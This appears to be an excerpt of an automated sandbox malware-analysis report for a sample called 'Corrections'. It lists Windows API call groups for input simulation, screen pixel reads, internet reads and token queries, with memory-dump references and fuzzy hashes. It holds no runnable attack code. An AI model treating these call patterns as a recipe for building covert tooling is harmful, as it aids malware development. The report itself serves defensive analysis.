                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00994390
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0099439A
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009943AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0f0d83b6f57483dfa21c43bc7b36315e6218f23ec9bcc8bbf3286a0f1f216d9d
                                                                                                                                                                                                                                                                                            • Instruction ID: 98649efb7e25eeccf645cc03b6425875a2716f51ca077ff004a4c2b476733e60
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f0d83b6f57483dfa21c43bc7b36315e6218f23ec9bcc8bbf3286a0f1f216d9d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6318670518346DEEF3ACB7CDE4AFB63BACAB01308F144569E466821A0E7A59486DB11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00982262
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 0098230E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00982316
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00982327
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0098232F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3a98defad0bc7f187914959eed938a41067c61cff941b872068847a952d1e6fb
                                                                                                                                                                                                                                                                                            • Instruction ID: 2f15049bb80ba3818f8168ad519afcba0c59f1ac8df9bad9ee14a07bed3e5db8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a98defad0bc7f187914959eed938a41067c61cff941b872068847a952d1e6fb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE31D171904219EFDB18DFA8CD8DADE3BB5EB04325F104229F925EB2D0D774A944DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0099CC63,00000000), ref: 0099D97D
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0099D9B4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0099CC63,00000000), ref: 0099D9F9
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0099CC63,00000000), ref: 0099DA0D
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0099CC63,00000000), ref: 0099DA37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 76a823190cd8930d735dc5b929cecd8a1d042aeb2ef0b4be22d89c36d895193c
                                                                                                                                                                                                                                                                                            • Instruction ID: cd21ec143ca5ded55aff7813a7e2ec8d0046bf479f2e10a06eed85d625546f93
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a823190cd8930d735dc5b929cecd8a1d042aeb2ef0b4be22d89c36d895193c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A314B71506205EFDF20EFA9D8C5AAAB7FCEF54354B10442EE546D2250E730AE40DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 009B61E4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 009B623C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B624E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B6259
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b508ec4426640bc32c51e504c4e1f30cb0d150c3de968dc3954e02c1063a021
                                                                                                                                                                                                                                                                                            • Instruction ID: c1c3656aaebccaa9bd5a5d919cdaa80d613d13093b21e0b7277b91be05fe14bc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b508ec4426640bc32c51e504c4e1f30cb0d150c3de968dc3954e02c1063a021
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA2191719142189AEB109FA4CD84FEEBBBCFB44334F14421AFA25EB180DB749985CF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 009A13AE
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 009A13C5
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 009A1401
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 009A140D
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 009A1445
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 878690a2cb78ae25686d0659d27e49bd70ebb837e9e3a97da227a7ae5b32da8c
                                                                                                                                                                                                                                                                                            • Instruction ID: 099c42e3ca30afab0398df5dc8b6b7c4f8064e82d0ccb468813fb948c672519c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 878690a2cb78ae25686d0659d27e49bd70ebb837e9e3a97da227a7ae5b32da8c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2921AE36605214AFDB04EF69D984A9EB7F9EF88310B048439E84A97351DA30AC04DF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0095D146
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0095D169
                                                                                                                                                                                                                                                                                              • Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0095D18F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095D1A2
                                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0095D1B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8de11faa9beed3f951fb0cfcdd02923f0521620ff5528a454df5b1d93e4c24ff
                                                                                                                                                                                                                                                                                            • Instruction ID: a02dc6d05a240aaf003e4f785be9676ee2ef44198e4b160188a4a85b40e2da32
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8de11faa9beed3f951fb0cfcdd02923f0521620ff5528a454df5b1d93e4c24ff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0401847661FA157F3335A7BB5C8CD7B6A6DDEC2BA23140229FD04C6244EA608D0593F0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b116e0cd32065da24a7b9885b4b58a3f3964da57275ddcd8b6749dd1f8b7a9aa
                                                                                                                                                                                                                                                                                            • Instruction ID: b17171cfa1858d0e883b1abc2634d84a9830b85f2f28ec44ad840069f5f37fe0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b116e0cd32065da24a7b9885b4b58a3f3964da57275ddcd8b6749dd1f8b7a9aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6801B5B2A44305BBDA14BA22DC82FAB735D9ED139CF004425FD069E342E765ED50C3AA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,0094F64E,0094545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00953170
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 009531A5
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 009531CC
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009531D9
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009531E2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c78b0cc8be318d09b47f222c1c456f939243d928ec0ab07528d49b2b2636ffe
                                                                                                                                                                                                                                                                                            • Instruction ID: 78bc933557c6bd7fdc86830dba6db770fdeaaef4ae5520137145467e7c1d9e46
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c78b0cc8be318d09b47f222c1c456f939243d928ec0ab07528d49b2b2636ffe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0801D67665DE006B9612E7379C85E2A276D9BD13F77204928FC1592182FE258A0D6350
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?,?,00980C4E), ref: 0098091B
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980936
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980944
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?), ref: 00980954
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980960
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fa4c1f29025af3befa971768dbf85fe59ec7533104c9a90ec02e4ca5c01bbea0
                                                                                                                                                                                                                                                                                            • Instruction ID: d16e172b3322315860c68eedd1f0b728f8f8d40ea4d4de463f89b3098d900887
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4c1f29025af3befa971768dbf85fe59ec7533104c9a90ec02e4ca5c01bbea0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B01F272611208BFEB405F54DC04B9A7BFCEF847A2F100228F905E2212F772CD00ABA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0098F2AE
                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0098F2BC
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0098F2C4
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0098F2CE
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 0098F30A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8e61e324ff70052a4551426e4b07797941314173dd4b0b1c21e707c4a6c04d83
                                                                                                                                                                                                                                                                                            • Instruction ID: 164e2b484e9467df71db0bf36e080cc55aafb66e063eb7a8ed1950bdab993bbd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e61e324ff70052a4551426e4b07797941314173dd4b0b1c21e707c4a6c04d83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6016975C0A619DBCF04AFA8E959AEEBB78FB08720F001566E511F2250EB309554DBA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
                                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2e4bb1ef3879087428de1ec3456b1baddaebaae7d23ca1d73ac08e420143b779
                                                                                                                                                                                                                                                                                            • Instruction ID: 8a1fc0c4498932627f156816ad4ff36b0b5699d5a0b85b20c63f57f93d1d6b74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e4bb1ef3879087428de1ec3456b1baddaebaae7d23ca1d73ac08e420143b779
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 470181B9616206BFDB155F64DD48D6A3B6DEF84374F210424F845D3360EA31DC419A60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00981916
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00981922
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00981931
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00981938
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0098194E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 93c8f1022670b0f9fe87206ebe95828afd1dc4ee9d6fa39d986cc43934ef87b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 823a7757eb175fce6c5081658baa63f5cb6829a5ee1825ab295096b22afa02f2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93c8f1022670b0f9fe87206ebe95828afd1dc4ee9d6fa39d986cc43934ef87b3
